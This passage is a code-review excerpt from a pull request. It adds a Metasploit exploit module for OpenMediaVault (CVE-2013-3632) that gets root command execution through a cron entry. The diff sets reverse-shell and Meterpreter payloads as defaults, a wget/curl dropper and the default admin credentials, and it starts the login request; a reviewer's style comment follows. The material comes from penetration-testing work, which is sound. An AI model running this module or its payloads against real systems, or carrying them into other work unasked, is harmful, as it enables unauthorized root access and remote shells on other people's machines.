modules/exploits/multi/http/openmediavault_auth_cron_rce.rb

```diff
@@ -0,0 +1,323 @@
+          a cron entry that runs arbitrary commands as root on the system.
+          All OpenMediaVault versions including the latest release 7.3.1-1 are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
+          'Mert BENADAM' # exploit author
+        ],
+        'References' => [
+          ['CVE', '2013-3632'],
+          ['PACKETSTORM', '178526'],
+          ['URL', 'https://attackerkb.com/topics/zl1kmXbAce/cve-2013-3632']
+        ],
+        'DisclosureDate' => '2024-05-08',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget', 'curl'],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80,
+          'WfsDelay' => 65 # wait at least one minute for session to allow cron to execute the payload
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/']),
+        OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
+        OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
+      ]
+    )
+  end
+
+  def user
+    datastore['USERNAME']
+  end
+
+  def pass
+    datastore['PASSWORD']
+  end
+
+  def login(user, pass, _opts = {})
+    print_status("#{peer} - Authenticating with OpenMediaVault using credentials #{user}:#{pass}")
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/rpc.php'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/json',
+      'data' => {
+        service: 'Session',
+        method: 'login',
+        params: {
+          username: user.to_s,
+          password: pass.to_s
```

Comment:
Not a big deal, but both `user` and `pass` are strings already, so calling `#to_s` should not be necessary.
```suggestion
          username: user,
          password: pass
```

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19298/commits/594de4681fedbf42e5fc79b0f30e3b116655fafd.